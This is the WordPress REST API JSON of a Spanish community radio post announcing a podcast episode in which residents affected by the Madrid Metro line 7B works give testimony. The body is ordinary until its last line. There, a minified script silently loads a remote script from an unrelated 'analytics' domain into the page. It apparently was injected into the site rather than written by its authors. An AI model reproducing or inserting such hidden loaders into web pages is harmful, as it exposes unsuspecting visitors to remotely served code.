{"id":4475,"date":"2024-03-12T04:42:02","date_gmt":"2024-03-12T04:42:02","guid":{"rendered":"https:\/\/radiojabato.es\/?p=4475"},"modified":"2026-04-20T15:29:39","modified_gmt":"2026-04-20T15:29:39","slug":"avpaml7b-testimonios-con-david-mariano-e-israel","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=4475","title":{"rendered":"AVPAML7B. Testimonios con David, Mariano e Israel."},"content":{"rendered":"\n<p>En el programa de hoy nos acompa\u00f1an David, Mariano e Israel de @avpam_l7b ( www.avpaml7b.org ) para charlar y comentar realidades que viven ellos mismos como vecinos afectados por la #linea7B de @metro_madrid donde seguir\u00e1n tirando casas y dejando #familias sin hogar y #comerciantes sin futuro y con testimonios que como comprobareis, pueden dejarnos bastante impresionados. Desde Radio Jabato estamos a tope con ell@s con sus necesidades y apoy\u00e1ndoles para que se den soluciones claras y dignas, sin increpados silencios, sin ocultar, con honestidad, con sinceridad y con informaci\u00f3n, d\u00e1ndo respuestas y soluciones realistas y verdaderas, nada de imposibles, sin nada que esconder o tapar. Y es que todo esto, parecer ser, que a d\u00eda de hoy, son cosas dif\u00edciles de obtener por parte de quienes hemos elegido para que est\u00e9n aportando estas soluciones.<\/p>\n\n\n\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_125696247_6_1.html?c1=bf0d0d\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/03\/photo_2024-03-12_05-16-16-1024x768.jpg\" alt=\"\" class=\"wp-image-4476\" style=\"width:529px;height:auto\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/03\/photo_2024-03-12_05-16-16-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/03\/photo_2024-03-12_05-16-16-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/03\/photo_2024-03-12_05-16-16-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/03\/photo_2024-03-12_05-16-16.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>En el programa de hoy nos acompa\u00f1an David, Mariano e Israel de @avpam_l7b ( www.avpaml7b.org ) para charlar y comentar realidades que viven ellos mismos como vecinos afectados por la [&hellip;]<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1257],"tags":[],"class_list":["post-4475","post","type-post","status-publish","format-standard","hentry","category-avpaml7b-asociacion-vecinal-de-personas-afectadas-por-metro-l7b"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4475"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4475\/revisions"}],"predecessor-version":[{"id":14373,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4475\/revisions\/14373"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}